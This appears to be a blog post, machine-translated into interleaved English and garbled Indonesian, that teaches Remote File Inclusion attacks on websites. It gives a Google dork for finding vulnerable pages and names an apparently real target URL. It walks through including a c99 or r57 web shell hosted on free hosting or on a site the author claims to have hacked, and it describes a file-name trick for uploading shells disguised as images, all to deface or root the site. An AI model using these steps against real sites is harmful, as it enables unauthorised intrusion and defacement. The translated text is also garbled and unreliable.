The answer is simple…, google help us to find that sites… Jawabannya sederhana ..., google membantu kita untuk menemukan bahwa situs ...
Example : Contoh:
find vulenrable page using goodle dork .. menemukan halaman vulenrable menggunakan dork Goodle ..
Dork : Dork:
inurl:.php?page= inurl:. php page =?
or u can easily find many dorks on google by simple searching RFI DORKS . atau u dapat dengan mudah menemukan banyak dorks di google dengan dorks pencarian sederhana RFI.
Now i have found this >…… Sekarang saya telah menemukan> ini ......
http://www.cbspk.com/v2/index.php?page= http://www.cbspk.com/v2/index.php?page =
here i see that i can put di sini saya melihat bahwa saya dapat menempatkan
page= page = http://google.com/ http://google.com/
let me do it … biarkan aku melakukannya ...
http://www.cbspk.com/v2/index.php?page=http://google.com/ http://www.cbspk.com/v2/index.php?page=http://google.com/
waoooo !!! waoooo! here se google is opening in this website body it means it's vuleb. di sini se google adalah membuka dalam tubuh website itu berarti itu vuleb. To RFI Untuk RFI
Screenshot Screenshot
Okay now what we have to do ?? Oke sekarang apa yang harus kita lakukan??
we did page=http://google.com kami lakukan page = http://google.com
there…now make account on any free webhosting site ada ... sekarang membuat account di situs webhosting gratis
like Followings are free webhosting websites seperti Berikut ini adalah situs webhosting gratis
=========================================================================== ================================================== =========================
* 110mb – http://110mb.com * 110MB - http://110mb.com
* Ripway – http://ripway.com * Ripway - http://ripway.com
* SuperFreeHost – http://superfreehost.info * SuperFreeHost - http://superfreehost.info
* Freehostia – http://freehostia.com * Freehostia - http://freehostia.com
* Funpic – http://funpic.de (How to remove ads?) * Funpic - http://funpic.de (Cara menghapus iklan?)
* Funpic – http://funpic.org (How to remove ads?) * Funpic - http://funpic.org (Cara menghapus iklan?)
* Freeweb7 – http://freeweb7.com * Freeweb7 - http://freeweb7.com
* t35 – http://t35.com * T35 - http://t35.com
* Awardspace – http://awardspace.com * Awardspace - http://awardspace.com
* PHPNet – http://phpnet.us * PHPNet - http://phpnet.us
* Free Web Hosting Pro – http://freewebhostingpro.com * Free Web Hosting Pro - http://freewebhostingpro.com
* ProHosts – http://prohosts.org * ProHosts - http://prohosts.org
* AtSpace – http://atspace.com * AtSpace - http://atspace.com
* ByetHost – http://byethost.com/ * Byethost - http://byethost.com/
* 000webhost – http://000webhost.com/ * 000webhost - http://000webhost.com/
* My5GB – http://www.my5gb.com/ * My5GB - http://www.my5gb.com/
* Oxyhost – http://www.oxyhost.com/ * Oxyhost - http://www.oxyhost.com/
* Rack111 – http://www.rack111.com/ * Rack111 - http://www.rack111.com/
* Ocostwebhost – http://0costwebhost.com/ * Ocostwebhost - http://0costwebhost.com/
* FreeZoka – http://www.freezoka.com/ * FreeZoka - http://www.freezoka.com/
=========================================================================== ================================================== =========================
And upload your c99 or r57 or any Other shell. Dan upload C99 atau R57 atau shell lain. according to the website if it is .php website then upload .php shell , if it's .asp website then upload .asp shell. menurut situs web jika situs php kemudian upload.. php shell, apakah itu. situs asp kemudian upload. asp shell.
Download most common used .asp and .php shells from here.. Ambil yang paling umum digunakan dan asp.. Kerang php dari sini ..
- .asp shells Asp kerang.
- .php shells Php kerang.
And get link of that uploaded shell From webhosting website. Dan mendapatkan link dari shell yang diupload Dari situs webhosting. and put that link equals to the vulenb site like … dan menempatkan link tersebut sama dengan situs vulenb seperti ...
http://www.cbspk.com/v2/index.php?page=http://www.seth.pt/portals/0/kp/kp1.txt ? http://www.cbspk.com/v2/index.php?page=http://www.seth.pt/portals/0/kp/kp1.txt ?
I know u are thinking why i put Saya tahu u berpikir mengapa saya meletakkan
page= http://www.seth.pt/portals/0/kp/kp1.txt ? page = http://www.seth.pt/portals/0/kp/kp1.txt ?
Don't get tensed haha Jangan tegang haha
coz i hacked www.seth.pt too so i uploaded shells there instead of any webhosting website and got link of that shells for further use of them. coz i hack www.seth.pt terlalu jadi saya upload kerang ada bukan website webhosting dan mendapat link dari yang kerang untuk digunakan lebih lanjut dari mereka.
NOTE: intro= http://www.seth.pt/portals/0/kp/kp1.txt ? CATATAN: intro = http://www.seth.pt/portals/0/kp/kp1.txt ?
Why i put ? Mengapa saya menempatkan? behind kp1.txt belakang kp1.txt
coz it's a shell script and for executing it we have to put a ? coz itu shell script dan untuk melaksanakan itu kita harus meletakkan? Behind that file , if we uploaded shell file in .txt format. Di balik file tersebut, jika kita upload file shell dalam format txt..
Finaly when u will open the link…………… Akhirnya ketika u akan membuka link ...............
http://www.cbspk.com/v2/index.php?page=http://www.seth.pt/portals/0/kp/kp1.txt ? http://www.cbspk.com/v2/index.php?page=http://www.seth.pt/portals/0/kp/kp1.txt ?
Then you will get screen like that Maka Anda akan mendapatkan layar seperti itu
It means here we have successfuly uloaded the shell…now Artinya di sini kita telah successfuly uloaded shell ... sekarang
access it's features to deface the website or have fun mengakses fitur itu untuk men-deface website atau bersenang-senang
===================================================== ================================================== ===
Now i think u have basic idea about shell uploading, we can upload shells in the websites Sekarang i think u punya ide dasar tentang upload shell, kita dapat meng-upload kerang di situs
that are vulnerable to sqli too because we can hack via sqli then got the web-admin and then yang rentan terhadap SQLi juga karena kita bisa hack melalui SQLi kemudian mendapatkan web admin dan kemudian
find the place where we can upload an image file or txt file. menemukan tempat di mana kita dapat meng-upload file gambar atau file txt. then make our shell name like.. kemudian membuat nama shell kita seperti ..
Example : Contoh:
from c99.php to c99.php;a.jpg dari c99.php untuk c99.php; a.jpg
and then upload it to website as an image file and make fool the server and when you get dan kemudian meng-upload ke situs web sebagai file gambar dan membuat menipu server dan ketika Anda mendapatkan
link of it in website just open it ….you get shell access ..now you can root that site. link di website hanya membukanya .... Anda mendapatkan akses shell .. sekarang Anda dapat root situs tersebut.
I will give more live example about each topic in last. Saya akan memberikan contoh yang lebih hidup tentang setiap topik di terakhir.
===================================================== ================================================== ===
sumber
1 komentar:
copied from a great hacker crazy3xploit blog's.
Post a Comment